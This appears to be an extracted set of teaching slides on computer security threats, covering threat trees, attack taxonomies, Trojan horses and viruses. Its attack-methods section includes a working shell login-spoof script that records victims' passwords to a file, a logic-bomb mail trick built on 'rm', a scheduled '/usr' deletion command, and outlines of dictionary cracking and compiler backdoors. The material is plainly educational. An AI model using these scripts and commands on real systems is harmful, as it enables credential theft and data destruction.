Embed Size (px)
Citation preview
Chapter 2
Threats To Computer Systems
2.1 Threats, Vaulnerabilities and Attacks
Threats: defines as any potential occurrence, malicious
and otherwise, that can have undesirable effect on the assets and resources associated with a computer system
Vulenerability: is some unfortunate characteristic that makes it
possible for a threat to potentially occur
Attack: is some action taken by malicious intruder that
involves the exploitation of certain vulnerabilities in order to cause an existing threats to occur
•2.2 Types of Threats
Categorization is needed to allow establishment of simple framework for understanding and solving security problems
Three main types of threats disclosure threat integrity threat denial of service threat
2.2.1 Disclosure threat
This threat involves the dissemination of information to an individual for whom that information should not be seen
This information may be in computer storage or in transit between computer systems
disclosure of information is called “leak”important for confidential organization such
as military, government etc.
2.2.2 Integrity threat
This threat involves any unauthorized change to information stored on a computer system or in transit between computer systems
non-critical information has less consequencecritical information can be disastrousimportant for battle plans and commercial
activities
2.2.3 Denial of service threat
This threat arises whenever access to some computer system resource is intentionally blocked as a result of malicious action taken by another user
critical for delaying weapon deployment or stock dealing
because the services are temporal characterized, this threat is more difficult to address than others
2.3 System Security Engineering
To deal with problems of threats, vulnerabilities and attacks, a new discipline has recently emerged in the security community known as system security engineering
security engineering process (Fig. 2.1) will involve understanding of the security problems and derives protections against these problems
Specify System Architecture
EstimateComponent Risk
Identify Threats,Vulnerabilites, Attacks
PrioritizeVulnerabilities
Identify and Install Safeguards
Risk isAcceptably Low
Figure 2.1 System Security Engineering Process
Specify System Architecture
Inspect the systemexamine the network, host, interface and
other associate architectureuse a structural specification include current
security methods usedinclude a description of functional propertiescreate a security priority list
Identify Threats, Vulnerabilities, Attacks
Identify potential threats from internal and external sources
estimate possible damage arises from attackestablish methodologies for minimise
possibilities of attack
Estimate Component Risk
Develop risk formulaIdentify risk componentsPrioritize risk factor
Prioritize Vulnerabilities
Base on risk priority developed in previous stage
this stage provide an order for installing security protections
limited resources may exist the high risk component will be deal with first
Identify and Install Safeguards
Identify all possible safeguard approaches include standard security mechanisms
safeguard mechanisms will be examined considerations on minimal in impact,
performance degradation, cost and resources are needed
2.4 Threat Tree
High level threats serve as the starting point for further decomposition
threat decomposition is based on a threat treemilitary standard MIL-STD 1785 is usedthreat tree is similar to decision tree used for
risk management & reliability engineering
2.4.1 Arbitrary Threat List Threat can be identified during system
design or developmentit can also identified by a random,
unstructured process called arbitrary threat list process
the list can be enriched during the design, development and operation stages
However, most threats have some unfortunate characteristics
Unfortunate Characteristics
Dubious Completeness: most threats are difficult to be identified completely
Lack of Rationale: known threats are identified by past history however ad hoc nature makes it difficult to rationale
Possible Inconsistencies: threats can be correlated and co-occurred. Independent events cannot prevent contradictory and redundant to be rectified simultaneously.
Arbitrary threat list must be avoidedespecially for some critical system missionsthe development of a threat tree can
overcome most of the shortfalls
2.4.2 Developing a Threat Tree
first identify a list of possible threatsthen introduce them in an iterative manner
and refine the description carefully and gradually
the tree structure allows various threats to be associated in a root-node relationship
this approach can rationale the identified threat and simplify a security solution
2.4.3 Structure of a threat tree
Each tree composes a top label called Threateach label will contain some generalized
description of threat present in a given systemeach root is a sub-threat which represents the
refinement for a given nodethe repetitive process will be terminated when
all threats and sub-threats are identified, i.e. complete
Sub-threat
Threat
Structure of a Threat Tree
Example: Hospital Computer System
Hospital Computer System Threat (HCST) is composed of Patient Medical Information (PMH) and non Patient Medical Information (NPMH)
PMH can further decomposed to Life Threatening (LT) and non Life Threatening (NLT) which both further decomposed to Disclosue (D), Integrity (I) and Denial of Service (DOS)
NMPH can be refined into Billing threat (B) and non Billing Threat (NB). Where both threats are further decomposed into Malicious Developer (MDEV) threats introduced beforehand and those are not (NMDEV) threats
a simplified threat tree for hospital computer system is shown as follows:
Threat Tree of HCS
LT
D
I DOS
PMH
NLT
D I DOS MDEV NMDEV MDEVNMDEV
HCST
NPMH
B NB
Effects:D: confidential patient information is
disclosedI: Patient information is corruptedDOS: Patient information is not availableNMDEV(B) : billing information is
corruptedMDEV (NB): internal schedules are
compromised
2.4.4 Using Threat Tree to Support System Security Engineering
Threat tree allows a structured means for documenting and organizing the estimation and calculations of critical, effort and risk factors
Critical defines the impact of the threat or the gain by introducing security measurements
Effort (E) defines the resources needed to resolve the threat
Risk (R=G/E) defines the normalized impact of threat if being attract
Example on Risk Calculation using (G,E,R) value and maximum risk selection
LT(8,2,4)
I(5,5,1)
PMH(8,2,4)
NLT(2.2,1)
MDEV(1,1,1)
NMDEV(2,1,2)
HCST(8,2,4)
NPMH(2,12)
B(2,1,2)NB(1,1,1)
DOS(8,2,4)D(1,1,1)
2.5 Categorization of Attack
“Computer Crimes are probably the tip of an iceberg - but just how big is the iceberg is no one know” T.Perry & P. Wallich
Traditional three classes: disclosure, integrity and denial of services
Unclassified attacks: internet browsing, computation, storage and whatever
To acoount for specific type of attack - taxonomies are used
2.5.1 Using an Attack Taxonomy
Attack Taxonomy is defined as any generalized categorization of potential attacks that might occur on a given computer system
Informal analysis can be used to identify threats and analytic means (threat tree) can be used to document attack or by reported experience with a target system
Attack scenarios are sometimes identified for certain classes of systems including real-time, database and LAN and they must be dealt with appropriately in the target system in the early stage of security system development
Precisely determination of the system and attack characteristics with the interaction of environment will subsequently develop the final attack taxonomy by reducing the known attacks
Attack Taxonomy
Target system
Attacks to the Target System
Using an Attack Taxonomy
Attack Taxonomy
(manyknownattacks)
Attack Taxonomy(fewer known
attacks)MitigateSelectattacks
MitigateSelectattacks
•••
Reducing Known Attacks
2.5.2 Considerations in Selecting an Attack Taxonomy
Completeness: the categories of attack should be accompanied by evidence that all potentially unfortunate occurrences have been accounted for in the target system. The attack must be justifiable. However, most attacks are unstructured and system dependent, empirical evidence is the strongest justification for completeness in an attack taxonomy.
Appropriateness: The selected attack taxonomy should appropriately characterize the attacks to the target systems. Assumption like malicious insiders are not present. Tradeoff sometimes required to evaluate common highly appropriate attack and less appropriate attack for a specified target systems
Internal vs. external threats: an attack taxonomy should differentiate between attacks form insider and outsider. Sometimes external attack taxonomy is entirely insecure for insider attack.
2.5.3 Example - Simple Attack Taxonomy
Operators Programmers Data Entry Internal Outside IntrudersPhysicalDestruction
BombingShort Circuits
InformationDestruction
Erasedisks
MaliciousSoftware
MaliciousSoftware
Via modem
DataDidding
MaliciousSoftware
False DataEnrty
Theft ofServices
Theft asuser
UnauthorizedAction
Via modem
Browsing Theft ofMedia
UnauthorizedAction
Via modem
Theft ofInformation
UnauthorizedAction
Via modem
2.5.4 Example: Risk-based Empirical Attack TaxonomySimplified taxonomy cannot cater for the
actual situation, empirical taxonomy with reasonable justification can make it more complete
Possible empirical attacks: external information theft (glancing at
someone’s terminal) external abuse of resources (smashing a disk
drive)
Masquerading (recording and playing back network transmission)
pest programs (installing a malicious program) Bypassing authentication or authority
(password cracking) authority abuse (falsifying records) abuse through inaction (intentionally bad
administration) indirect abuse (using another system to create a
malicious program)
External Information theft unauthorized individual stealing information or
glance at other’s terminal to steal sensitive information like password, salary data, confidential information and so on
Avoid by setting external procedures such as secured terminal room, secured printer or paper shredders for discarding sensitive information
External Abuse of ResourcesThis involves physical destruction of hardware such as
disk drives, circuit boards, communication media and so on
Because this is an integrity attack, attacker must physical access to the physical resources but not necessary the internal resources
physical destruction may include vandalizing, switching off air conditioner or electrical power
sometimes abuse may not damage the hardware such as jamming or tapping
Avoidance by introducing physical security means like locked, guarding, surveillance camera and so on
External Masquerading this involves a malicious intruder successfully
impersonating another user using some mechanism external to the computer system
examples are: tapping communication medium, recording the information transferred and playing back this information in a later time
this attack has been used by network hacker to avoid from being located
Avoidance by setting up proper network security procedures but the techniques are not straightforward
Pest Programs this includes attacks that are set up by malicious
individuals to cause subsequent harma pest program can be views as time bomb, I.e. it
will occur at a much later time this time lag may provide opportunity for an
intruder to cover tracks and avoid being caught instantaneous
well know types are Trojan horse and virus attacksCountering pest program requires secure internal
controls, awareness broadcasting and possible some shield programs
Bypassing of Internal Controls this involves the explicit avoidance of controls that
are set up to protect the resources on a computer system
Bypassing usually refers to authorization, access and authority control. The technique is based on clever use of some existing logical flaw in the system
Examples are well known password cracking techniques that subvert protective approaches that contain flaws and operating system and compiler attacks usually involves logical exploitation of flaws to bypass authority
Active Authority Abusethis attack occurs when an individual is
trusted to perform some type of sensitive or important function and then actively abuses this privilege
Examples falsifying certain data entries or granting services in improper manner
Avoidance is difficult but can be minimized by personnel screening, background checks and even polygraph tests
Abuse through Inaction this involves the willful neglect of duty by some
malicious individualattack occurs whenever some action is required to
avoid a harmful situation but is not performedexample is that an administrator has neglected the
maintenance of a system or recorder in order to cause degraded or denied service
avoidance by identifying all possible inaction, this is the first step for all attack avoidance mechanism.
Indirect Abuse this involves an off-line system and is
characterized by behavior that may appear normal but is actually being carried out as a component or step in some comprehensive attack
Example: an indirect abuse involves the factoring a large number on one system as a mean for breaking a protection routine on another system.
Avoidance is extremely difficult because the appearance is completely normal to the system being used.
2.6 Trojan Horses and Viruses
A type of program that is well known of provide self-reproduction is called Trojan Horse
This program is allow to distribute and propagate across different computer systems and is known as virus
2.6.1 Trojan Horses
A Trojan Horse program shall be defined as any program that is expected to perform some desirable function but that actually performs some unexpected and undesirable function
It means that Trojan Horse program may look like a good program but it can potentially turns into harmful
Examples: cat command in unixuser
“cat x”(normal version)
“cat x”(Trojan Horseversion)
Normal sequence ofoperatingsystemroutines
Maliciously altered
sequence ofsystemroutines
In a trusted group, the Trojan Horses is not critical and this approach allows co-workers to share information and resources and the malicious program will not be created
however if Trojan Horses has infiltrated into an trusted environment and can self-reproduced and propagated
this becomes viruses
2.6.2 Viruses
A virus program is defined as any Trojan Horse program that has been designed to self-produce and propagate so as to modify other programs to include a possible modified copy of the virus.
As computer networks have become more widespread, the potential for huge propagation has increased and this type of attack has become serious
Figure below shows how viruses can be created as Trojan horse on one machine and then duplicated on others via some propagation means
Trojan HorseCreation
System A
Trojan HorseDuplication
Trojan HorseDuplication
System B (connected to system A)
System C (No connection to system A)
Manual propagation
Electronicpropagation
2.6.3 Self-Reproducing Programs
Self reproducing program is the key feature of virus
this feature is created by using the following steps: declare a character string that corresponds to the
main body of the program print each character of the defined string individually print the value of the array as a defined character
string
Example: Self reproduce program
Char t[] ={'0', ' ', '}', 'm', 'a', 'i', 'n', …., 't', ')', ';', '}', 0};
main()
{ int i,
printf(“char t[] ={“);
for (i=0; t[i]!=0;i=i+1)
printf(“%d, “, t[i]);
printf(“%s”, t);
}
Self reproducing program is so critical because it provides the basic mean by which copies of a Trojan horse can be produced automatically
combine such copies with a compiler allows one to create as many copies of the Trojan horse as one desires to compile
insertion of addition codes can cause damage when execute
2.6.4 Typical Virus Operation
Malicious intruders can initiate a virus attack by creating a program that does the following: finds a connected system and sends self-reproducing
code via remote copying command initiates a a remote compilation of the self-
reproducing code via the remote execution command
the process can repeat and affect other systems
Virus DuplicateVirus
DuplicateVirus
(1) send reproducing virus
(2) remotely execute virus
(3) sendreproducingvirus
(4) sendreproducingvirus
Virus Propagation
Example : simple virus operation
virus
while true do
find_host (h);
remote_copy (h,virus);
perform_damage;
remote_execute (h,virus);
od;
Example: Internet Virus
First Internet Virus was reported 1988 and was unleashed by a Cornell University student which has infected over 60,000 host computers
the virus attack data, TCP/IP communication protocol and steal password
the virus was detected and terminated by a team from MIT and Berkeley
however, the designer caught claimed that he has made a mistake in the programming
2.6.5 Trojan Horse CluesPresence of Trojan Horse can be detected by:Suspicious Originator and Distribution: choose
some reliable software/hardware manufacturer and distributor to avoid suspicious system components
Unexpected Size or Other Attributes: if the program size and attributes becomes suspicious, such slow time respond, the program needs to be investigated
Undocumented Origin and Experience:malicious or incompetent source are expected for this issue
2.7 Common Attack Methods
Password SpoofPassword theftlogic bomb mailscheduled file removalfield separator attackinsertion of compiler Trojan Horse
2.7.1 Password Spoof Program
The first type of attack involves spoofing a user into believing that a computer terminal is correctly prompting that user for login and password information
normally, a Trojan Horse program is used to fake the normal login sequence that a user expects
Properties of spoofing program: the attacker gains physical access to the target
individual’s computer terminal the attacker logs onto the target system using
whatever login and password are available to the attacker (if the attacker is an insider, then they could be his own). It is possible to use a different target computer with some procedure change
the Trojan Horse spoof program is left on the terminal for the target individual.
Example: Unix-like command
B1=‘ORIGIN: NODE whd1 MODULE 66 PORT 12’
B2=‘DESTINATION:’
FILE=$HOME/secure/suckers/fools
trap ‘’ 1 2 3 5 15
echo $B1
sleep 1
echo $B2
read dest
echo ‘login:
read login
stty -echo
echo ‘password:
read password
stty echo
echo ‘’
echo $login $ password >>$file
echo ‘login incorrect’
exec login
Responds
ORIGIN: NODE whd1 MODULE 66 PORT 12’
DESTINATION: node/mysystem
login: abc
password:xxxxx
login incorrect
login: abc
password:xxxxx
$
2.7.2 Password theft by clever reasoning
Password are mnemonic and can be guessed easily
First guess example: spouse’s name, children’s name, pet’s name, license plate number, phone number, date of birth, date of marriage, favorite sports team and so on
Second guess example - easy to type pattern: “qaql”
Last approach - attack on the password file and encryption function obtain a copy of the password and encryption
function obtain an electronic dictionary create a routine that encrypt every entry in the
dictionary and compare it with all entries in your copy of the password file
any match will real a valid password
Advantages: the intruder does guess or infer the password directly, the attack can be performed offline
2.7.3 Logic Bomb MailLogic bombs are programs that remain
dormant until some predetermined logical condition on the target system becomes true
Step for setting up logic bomb: set up a command that removes all files (e.g. “rm”)
as an edit parameter to file EDIT_ME mail EDIT_ME to your system administrator
if the administrator do not open the file, it will do no damage otherwise all file will be erased
2.7.4 Scheduled File RemovalSchedule file is used to schedule the smooth
running of programs in a computerOn UNIX, command “at” is usedExample:
rm -f -f /usr
at 0400 Sunday attack
Program will be placed in the write-protected directory and will execute file removable recursively (-f) without diagnostics (-f) every Sunday
2.7.5 Field Separator Attack
This attack relies on several technical assumptions: field separators exist privilege execution program/command exist the actual file name of the administrator want to
execute
Steps to create such attack redefine ‘/’ as ‘ ’ hence pathname “/foo/moo”
becomes “ foo moo” knowing the administrator will use “sysprog” to
open file called “/foo/moo”, create a program call “foo” in an accessible directory. Program “foo” will transfer the administrator to the intruder
when “sysprog” is invoked, the program “foo” is executed and the attack is achieved.
2.7.6 Insertion of Compiler Trojan Horse
Compiler Trojan Horse attack will create a more widespread damage
Normal simplified Compiler operation:compile:
get (line);
translate (line);
The goal of Trojan Horse is to look for certain text patterns in the input programs for compile to translate and code insertion
Example:Compile:
get (line);
if line = ‘read_pwd(p)” then
translate (Trojan horse insertion);
else
translate (line);
fi;
The Trojan Horse program may introduce a password backdoor and allow get into the system using common password like “12345”
2.7.7 Simple Attack Prevention Methods
Individual Screening checking background of individual who allow to
access the system may introduce attack to the system
Physical Control securr the facilities with an enclosed
environment
Care in operation set up security procedures
2.8 References
E Amoroso - Chapters 1- 5
